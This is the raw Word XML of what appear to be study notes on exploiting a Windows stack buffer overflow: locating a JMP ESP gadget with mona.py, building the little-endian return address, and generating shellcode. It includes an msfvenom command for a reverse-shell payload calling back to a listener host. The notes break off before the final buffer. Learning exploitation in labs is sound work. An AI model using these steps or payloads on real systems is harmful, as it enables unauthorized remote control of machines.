    <w:p w14:paraId="41740F0D" w14:textId="3630A0A7" w:rsidR="00E16CEE" w:rsidRPr="0066080F" w:rsidRDefault="00E16CEE" w:rsidP="0066080F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066080F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>FINDING AN RETURN ADDRESS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028FED8E" w14:textId="717B1F4A" w:rsidR="00E16CEE" w:rsidRDefault="00E16CEE" w:rsidP="00E16CEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E16CEE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We can save</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> our shellcode at the address pointed at by the </w:t>
      </w:r>
      <w:r w:rsidR="004C350D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> esp  but we need a consistent way to get that code executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3746A0" w14:textId="1F928434" w:rsidR="004C350D" w:rsidRDefault="009F0A3A" w:rsidP="00E16CEE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b/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F94B452" wp14:editId="4192A826">
            <wp:extent cx="667512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4F00" w14:textId="399D4FFA" w:rsidR="004C350D" w:rsidRDefault="004C350D" w:rsidP="00E16CEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">METHOD: We can use a reliable static addresses that we can use and it must contain </w:t>
      </w:r>
      <w:r w:rsidRPr="004C350D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">JMP ESP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F2D05" w14:textId="7D5484F4" w:rsidR="004C350D" w:rsidRDefault="001B291E" w:rsidP="00E16CEE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>CRITERIA FOR STAIC MEMORY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7D8F56" w14:textId="0B1C30EA" w:rsidR="001B291E" w:rsidRPr="001B291E" w:rsidRDefault="001B291E" w:rsidP="001B291E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B291E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NO ASLR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E4EC62" w14:textId="60850A8D" w:rsidR="001B291E" w:rsidRDefault="001B291E" w:rsidP="001B291E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B291E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">NO BAD CHARACTERS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424B85D4" w14:textId="67EEC687" w:rsidR="00D914C0" w:rsidRDefault="00D914C0" w:rsidP="00D914C0">
      <w:pPr>
        <w:ind w:left="360"/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>We use the script mona.py in immunity debugger for this processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E431743" w14:textId="316ADD3E" w:rsidR="00D914C0" w:rsidRPr="003E6254" w:rsidRDefault="00D914C0" w:rsidP="003E6254">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3974"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8014A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219E3" wp14:editId="73B9EDC0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1327201</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>25730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1163117" cy="138989"/>
                <wp:effectExtent l="0" t="0" r="1841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1389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699E0" id="Rectangle 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:104.5pt;margin-top:2.05pt;width:91.6pt;height:1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" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00B8014A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step1:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">-&gt;bottom of the screen     type  </w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>!mona</w:t>
      </w:r>
      <w:r w:rsidR="00A93CF0">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:r w:rsidR="005220FA" w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EBFBD1" w14:textId="1EB1D458" w:rsidR="005220FA" w:rsidRPr="003E6254" w:rsidRDefault="005220FA" w:rsidP="003E6254">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3974"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8014A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step2:</w:t>
      </w:r>
      <w:r w:rsidR="00B8014A" w:rsidRPr="00B8014A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> see for all the columns set to false</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>first column should not contains bad character</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78344DA9" w14:textId="77777777" w:rsidR="006C4CEE" w:rsidRPr="003E6254" w:rsidRDefault="003A5610" w:rsidP="003E6254">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3974"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8014A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step3:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C4CEE" w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">we need to find the JMP ESP statement  . we use the </w:t>
      </w:r>
      <w:r w:rsidR="006C4CEE" w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msf-nasm-shell</w:t>
      </w:r>
      <w:r w:rsidR="006C4CEE" w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find the hex equivalent of the statement given.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15004FEA" w14:textId="4C3E1E8C" w:rsidR="003A5610" w:rsidRDefault="006C4CEE" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4CEE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Input:-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nasm &gt; jmp esp  </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4CEE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>output:-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4CEE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">00000000 </w:t>
      </w:r>
      <w:r w:rsidRPr="006C4CEE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FFE4</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4CEE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> jmp esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0626B5FC" w14:textId="2F7FC73E" w:rsidR="006C4CEE" w:rsidRDefault="006C4CEE" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F0A3A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>To search in immunity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="008B508E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>!mona find -s “\xff\xe4” -m “&lt;module name&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB13D18" w14:textId="06A2D2DB" w:rsidR="006C4CEE" w:rsidRDefault="006C4CEE" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4CEE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FFE4 -&gt; \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C4CEE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C4CEE">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>\xe4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C50670" w14:textId="77777777" w:rsidR="00E56FD9" w:rsidRDefault="00E56FD9" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350B8220" w14:textId="1E42CB76" w:rsidR="00E56FD9" w:rsidRPr="003E6254" w:rsidRDefault="00E56FD9" w:rsidP="003E6254">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3974"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8014A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>STEP 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6254">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   if the address from the above search is for e.g.:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72901287" w14:textId="3DDCC11F" w:rsidR="00E56FD9" w:rsidRDefault="00E56FD9" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56FD9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  0x10090c83   =&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>eip=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E56FD9">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> \x83\x0c\x09\x10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">        (reverse and group 2 by 2 and add x b4 it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272BE427" w14:textId="77777777" w:rsidR="00B8014A" w:rsidRDefault="00B8014A" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DC6347" w14:textId="77777777" w:rsidR="00B8014A" w:rsidRDefault="00B8014A" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D97857" w14:textId="2156559B" w:rsidR="00B8014A" w:rsidRPr="0066080F" w:rsidRDefault="00B8014A" w:rsidP="0066080F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3974"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066080F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Generating payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081EE2F2" w14:textId="57596645" w:rsidR="00B8014A" w:rsidRDefault="00B8014A" w:rsidP="00B8014A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16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="00495994">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 EXITFUNC= thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\3d</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8014A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00B8014A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A7E3FB" w14:textId="007F385E" w:rsidR="00B8014A" w:rsidRDefault="00B8014A" w:rsidP="00B8014A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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-p payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB80405" w14:textId="07CDF355" w:rsidR="00B8014A" w:rsidRDefault="00B8014A" w:rsidP="00B8014A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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-e encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA22E10" w14:textId="36B22189" w:rsidR="00B8014A" w:rsidRDefault="00B8014A" w:rsidP="00B8014A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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>-b bad characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABD47CB" w14:textId="24A85642" w:rsidR="00B8014A" w:rsidRPr="00B8014A" w:rsidRDefault="00027FC3" w:rsidP="00B8014A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</w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>nasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0D5629B7" w14:textId="57596645" w:rsidR="003E6254" w:rsidRDefault="003E6254" w:rsidP="00D56040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24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5200E581" w14:textId="48EFDD0B" w:rsidR="00FF6182" w:rsidRDefault="00483F8C" w:rsidP="00FF6182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 xml:space="preserve">Final </w:t>
      </w:r>
      <w:r w:rsidR="00210A90">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>windows buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00210A90">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
